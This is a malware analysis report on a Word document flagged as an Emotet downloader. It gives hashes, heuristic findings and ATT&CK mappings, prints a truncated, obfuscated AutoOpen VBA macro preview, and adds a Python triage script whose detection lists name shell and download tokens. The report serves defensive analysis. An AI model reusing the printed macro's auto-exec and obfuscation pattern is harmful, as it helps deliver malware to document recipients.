Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 26f2a9b7172f6470…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 164.5 KB
Created: 2018-04-11 08:32:00
Authoring application: Microsoft Office Word
First seen: 2019-11-20
MD5: 0ccc7b7948bc0039180172138f9014a3
SHA-1: 38e53723f074f1ed400fb7e034961aeff4f9cc20
SHA-256: 26f2a9b7172f64702c5a816d80a20b7d2855732b4131f240e6a6c74d2665d34c
Risk Score: 224

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1566.001 Phishing: Spearphishing Attachment

The sample is a Word document in the legacy OLE (binary .doc) container carrying an obfuscated VBA project. An AutoOpen procedure runs as soon as the document is opened with macros enabled; the visible source shows it handing execution off through Application.Run, and the OLE_VBA_CREATEOBJ heuristic reports a CreateObject call elsewhere in the project (the preview below is truncated before it). The macro body is padded with dead code (unused CByte/Cos/Oct expressions, "N + X - X" arithmetic that evaluates to N) and pulls substrings out of junk-padded base64-like string literals, the usual shape of a document downloader that assembles and launches a second-stage command at run time. The ClamAV family name (Emodldr) points to an Emotet document downloader, so the expected second stage is a download-and-execute of the Emotet payload. The p-code and WordBasic heuristics corroborate the same auto-execution surface rather than adding independent detections.

Heuristics (8)

  • ClamAV: Doc.Malware.Emodldr-10025032-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. In this report a VBA project was in fact recovered (macros.bas below), so this marker is redundant with the AutoOpen finding above and should not be counted as a second auto-execution mechanism.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the DrawingML XML namespace that Office writes into documents itself; it is not a contact point for the payload and should not be treated as an indicator of compromise.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename     Kind        Source                                                Size
macros.bas   vba-macro   oletools.olevba.extract_macros (decoded VBA source)   39974 bytes
SHA-256: 2d4abacbcfc0d148b6cc1861152f39097354308447e2bcf12cb2fcf270ae0543
Detection
ClamAV: No threats found (the Doc.Malware.Emodldr hit above was on the document itself and does not carry over to the decoded source, so this artifact's verdict rests on the obfuscation checks below)
Obfuscation or payload: likely
Carved artifact contains 24 long base64-like blob(s). In the preview these are the junk-padded string literals passed to TtJpwT() together with a start offset and a length, i.e. the real fragments are substrings the macro extracts at run time; the body of TtJpwT and the code that assembles the fragments lie past the truncated preview.
Preview script: first 1,000 lines of the extracted source (truncated below)
Attribute VB_Name = "NCzHQsXJMZZmM"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
EfPzaz = CByte(uolYwX)
UOVZIT = fMHnwq
iLtwZ = Cos(11855 - Oct(85566 + AswMZf * BnOVbp - CBool(bKnTD)))
Application.Run THLdH + "FfpDWOmzHSOojF" + LcrcYQ, sNdcwu + NLGqwLnjQrj + uKTZb
LTjjJ = CByte(DSIth)
EoTIJ = qEdwB
hqYpfI = Cos(76454 - Oct(74427 + sZssI * RNfkU - CBool(JrGtlA)))
End Sub

Attribute VB_Name = "jWlPSkBS"
Sub NnzFuQ(ObPBs)
qwMjC = CByte(wSwtH)
DfHKaH = AkArk
BsfrS = Cos(42532 - Oct(98538 + KjnCl * cTOQus - CBool(qlEEBH)))
End Sub
Function NLGqwLnjQrj()
On Error Resume Next
dZmqAC = CByte(wcGiL)
DtLTa = BKDzC
mwcVSr = Cos(74801 - Oct(52637 + zFujrI * lGszc - CBool(zumKS)))
MmPuwfEWw = TtJpwT("fL4mADEAOQAyADMANwKjq", 4 + UjiaMQ - UjiaMQ, 15 + UjiaMQ - UjiaMQ)
Mhabk = CByte(OFjaKO)
jVEnRn = EcYzFF
RzhiH = Cos(47668 - Oct(72608 + FZdJi * CsLvdF - CBool(ztGVXk)))
AisdzR = CByte(uiBUN)
tAwWpY = jhPjul
EpKAT = Cos(8925 - Oct(64571 + zHtfC * WMSNoi - CBool(ZITFj)))
TWDsID = TtJpwT("muQA3ADcAOQA3AD4j6c", 3 + kIdWfj - kIdWfj, 13 + kIdWfj - kIdWfj)
OTTMi = CByte(BFEUA)
IQlCp = JWtNUw
GGFij = Cos(82180 - Oct(91336 + ASoduK * AmRrR - CBool(fNZXS)))
cEJpc = CByte(fmNTPN)
wntjlH = FkVjim
YIBHZ = Cos(52893 - Oct(98958 + MJUAHQ * SnCfFl - CBool(BTdKNz)))
wCTKdWj = TtJpwT("8BtSjEAOABhADQAYwA1ADUAYwA5AGYAMQA3AGEANAA3ADMAZgA2ADEAZABiAGEANQA2ADMAOABkADMAOABjADcAMwAwAGYAYwA4ADkAZgA0ADEAYQA2ADUANAAxADgANwA1AGz5", 6 + vNKAwW - vNKAwW, 128 + vNKAwW - vNKAwW)
jdLpcH = CByte(LMpmjL)
jPlAha = hdwhj
GiiPNC = Cos(84950 - Oct(56520 + JKiJAH * NtZZES - CBool(sKjWb)))
ZfUQYj = CByte(iwpACV)
iuTizD = spsFjw
iFXofs = Cos(21177 - Oct(38541 + DSODmX * XhGFB - CBool(JFOAv)))
IDjdLvmudR = TtJpwT("5D8UigANwBmADQAYgAxADMAOAA4AGYAYQA1ADEAMAA3AGYANAAwAGIANwBkADkAZAA0ADYAYQA4ADcAMwA3ADUANQA4ADgAZAAzADMANgAyADEAYwA2AGEAMwAzADMAMQAwADAAYgA4ADMAMABlAGUAMgA1ADMil", 6 + zMItO - zMItO, 153 + zMItO - zMItO)
pcLskO = CByte(tSMWc)
KSPLjA = VXUYZt
IvRafz = Cos(59386 - Oct(59282 + rZioi * zLKdYq - CBool(tufzw)))
WfPVrU = CByte(SuiiQ)
wlUjIT = qKCcHm
KWPja = Cos(45318 - Oct(549 + POUTK * BfozCb - CBool(YEzliL)))
lvhQl = TtJpwT("qAGMAZQBiAGIAMAA5ADcAOQAzADgAZQAzAGEANgA2ADEAZABjAGUANQBhADQAOQBjAGEAYgAzADAAOQAxADAAMwA5AGUAZAAwAGIAMQAzADUAZQBiAGYAZgA2AGMAZQAwADYAZQBjAGYAZAA5AGYAYwAzADgAMQAzADUANQGHfk2GUz", 2 + RHnTr - RHnTr, 166 + RHnTr - RHnTr)
LdnNFQ = CByte(wfwIsZ)
VFPpIF = fOiFKZ
RQvvMH = Cos(12871 - Oct(73747 + GNtsFz * oJBwCw - CBool(vVFDjP)))
RzFfU = CByte(lZfCl)
kVPAjo = UaGLQ
rUIEH = Cos(4975 - Oct(89598 + PBNdY * MdZhH - CBool(adCuu)))
PEYXXpOD = TtJpwT("v1QAyAGUANwBjADZqj3", 3 + IurDi - IurDi, 13 + IurDi - IurDi)
aOFaL = CByte(oSdscU)
zqVUT = WKXqq
ZEqlO = Cos(35655 - Oct(27054 + GcfGo * bpFoTB - CBool(IHiFI)))
CaLko = CByte(iCwfFG)
liIBV = DtVnn
ULhmz = Cos(6417 - Oct(22426 + XavZF * jMqcX - CBool(wEfqXp)))
VzpzSwOT = TtJpwT("YABiADUAYgAxADYAZQBkADAAMgBkADIAMQA1AGYAZQBjADIANQBhADIAKiTLwIIU", 2 + sXqCYO - sXqCYO, 55 + sXqCYO - sXqCYO)
sZIhm = CByte(PURwP)
btiuKn = vHkrCs
vXPfr = Cos(30477 - Oct(18028 + TwPsIA * tOPbfv - CBool(OJVCnu)))
HQYZzZ = CByte(jckqQ)
wsFSOJ = Hofrj
rmiFr = Cos(13157 - Oct(9238 + VAwzz * GpmIVp - CBool(vauDvQ)))
aJksqtTzQpZ = TtJpwT("ZWAAOQA4ADcAOAA2AGQAZgAyAGYAYgAzADUAYQA0ADMAMABiAGYANwAzADcAZAA2AGUAZQBhADYAYwA1ADIANwBkAGMAMgBkADAANABiAGMAZQBjAGQAMwBmADIAZgA5ADQANQA0AGUAOABkAGUAYQAwAGEAYwA3ADkAZB1S58L", 3 + HhFpW - HhFpW, 163 + HhFpW - HhFpW)
VSlhp = CByte(iYBXsj)
XdrGS = UHRCW
ukvMk = Cos(2862 - Oct(92745 + owCPRK * GhoPQ - CBool(iJSinl)))
wndNv = CByte(JqdjA)
mBonu = HCiOk
miUiX = Cos(70341 - Oct(43421 + WLWRDk * KilFIY - CBool(SEFwwt)))
jwtMS = TtJpwT("IGYAYwAxADgANAAzAGIAZQBhADcANQA0ADAAYwA1ADgANQAzAGIAZAA1ADgAYgBmADQAYwA1AGEAYgA5ADUAZQBjADAAYQAyAGMAYwBjADIAZQAzAGMAZQA2AGYANwAyADEAZABjADQAOAA2ADuL40w0F", 2 + vJEQPL - vJEQPL, 145 + vJ
... (truncated)
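As an added example, not code from the analysis platform and not part of this report, the following Python reproduces the three checks that drive the verdict above (auto-exec entry point, execution tokens, base64-like string blobs) over a constructed VBA sample modelled on the macros.bas preview, and folds the "N + X - X" junk arithmetic seen in the TtJpwT calls back to plain literals so the real arguments become readable. The entry-point list, the token list, the 16-character blob threshold, the scoring rule and the CreateObject line in the sample are all assumptions chosen for illustration.

```python
"""Static triage of extracted VBA source, mirroring the OLE_VBA_* heuristics.

Added example, not code from the analysis platform. The entry-point list,
the execution-token list, the 16-character blob threshold and the scoring
rule are assumptions chosen for illustration.
"""
import json
import re
from typing import Dict, List

# Procedures Word/Excel run without user interaction (OLE_VBA_AUTOOPEN).
AUTOEXEC_NAMES = (
    "AutoOpen", "AutoExec", "AutoNew", "AutoClose", "AutoExit",
    "Document_Open", "Document_New", "Document_Close",
    "Workbook_Open", "Workbook_Activate", "Auto_Open",
)
# Calls that hand control to something outside the document; CreateObject is
# what OLE_VBA_CREATEOBJ keys on, the rest are common shell/download tokens.
EXEC_TOKENS = (
    "CreateObject", "GetObject", "Shell", "Application.Run", "WScript.Shell",
    "Win32_Process", "powershell", "cmd.exe", "URLDownloadToFile",
    "XMLHTTP", "ADODB.Stream",
)
# 'Sub AutoOpen()', 'Private Function X()', ...
PROC_DEF = re.compile(
    r"^\s*(?:(?:Public|Private)\s+)?(?:Sub|Function)\s+([A-Za-z_]\w*)",
    re.MULTILINE | re.IGNORECASE,
)
# 'N + X - X' evaluates to N; the obfuscator uses it to hide literal arguments.
JUNK_ARITH = re.compile(r"\b(\d+)\s*\+\s*([A-Za-z_]\w*)\s*-\s*\2\b")
# Quoted runs of the base64 alphabet (16-character threshold is assumed).
BASE64_BLOB = re.compile(r'"([A-Za-z0-9+/]{16,}={0,2})"')


def normalize_junk_arithmetic(src: str) -> str:
    """Fold 'N + X - X' back to N so the real call arguments are readable."""
    return JUNK_ARITH.sub(r"\1", src)


def find_autoexec(src: str) -> List[str]:
    """Return auto-execution entry points defined in the source, canonical case."""
    canonical = {n.lower(): n for n in AUTOEXEC_NAMES}
    found: List[str] = []
    for m in PROC_DEF.finditer(src):
        name = canonical.get(m.group(1).lower())
        if name and name not in found:
            found.append(name)
    return found


def find_exec_tokens(src: str) -> List[str]:
    """Return execution/download tokens present anywhere in the source."""
    return [t for t in EXEC_TOKENS if re.search(re.escape(t), src, re.IGNORECASE)]


def find_base64_blobs(src: str) -> List[str]:
    """Return quoted literals that look like (possibly junk-padded) base64."""
    return BASE64_BLOB.findall(src)


def triage(src: str) -> Dict[str, object]:
    """Score the source the way the report's heuristics escalate it."""
    clean = normalize_junk_arithmetic(src)
    autoexec = find_autoexec(clean)
    tokens = find_exec_tokens(clean)
    blobs = find_base64_blobs(clean)
    junk = len(JUNK_ARITH.findall(src))
    # Auto-exec together with an execution token is the pairing that
    # OLE_VBA_PCODE_AUTOEXEC_EXEC describes; either alone is only suspicious.
    if autoexec and tokens:
        verdict = "high"
    elif autoexec or tokens:
        verdict = "medium"
    else:
        verdict = "low"
    return {
        "autoexec": autoexec,
        "exec_tokens": tokens,
        "base64_blobs": len(blobs),
        "junk_arithmetic_sites": junk,
        "obfuscation_likely": bool(blobs) or junk > 0,
        "verdict": verdict,
    }


# Constructed sample modelled on the macros.bas preview on this page. The
# CreateObject line is invented to stand in for the call the preview truncates.
SAMPLE_VBA = '''Attribute VB_Name = "NCzHQsXJMZZmM"
Attribute VB_Base = "1Normal.ThisDocument"
Sub AutoOpen()
On Error Resume Next
iLtwZ = Cos(11855 - Oct(85566 + AswMZf * BnOVbp - CBool(bKnTD)))
Application.Run THLdH + "FfpDWOmzHSOojF" + LcrcYQ, sNdcwu + NLGqwLnjQrj + uKTZb
End Sub
Function NLGqwLnjQrj()
On Error Resume Next
MmPuwfEWw = TtJpwT("fL4mADEAOQAyADMANwKjq", 4 + UjiaMQ - UjiaMQ, 15 + UjiaMQ - UjiaMQ)
TWDsID = TtJpwT("muQA3ADcAOQA3AD4j6c", 3 + kIdWfj - kIdWfj, 13 + kIdWfj - kIdWfj)
Set hMzsi = CreateObject("winmgmts:win32_process")
End Function
'''

if __name__ == "__main__":
    print(json.dumps(triage(SAMPLE_VBA), indent=2))
    print(normalize_junk_arithmetic(SAMPLE_VBA))
```

Running it on the constructed sample reports AutoOpen as the entry point, CreateObject, Application.Run and Win32_Process as execution tokens, two base64-like literals and four junk-arithmetic sites, and rewrites the first TtJpwT call as TtJpwT("fL4mADEAOQAyADMANwKjq", 4, 15). Because the fragments are substrings of junk-padded literals, decoding them individually is not meaningful; recovering the second-stage command needs the TtJpwT body and the concatenation order, both of which sit past the truncated preview.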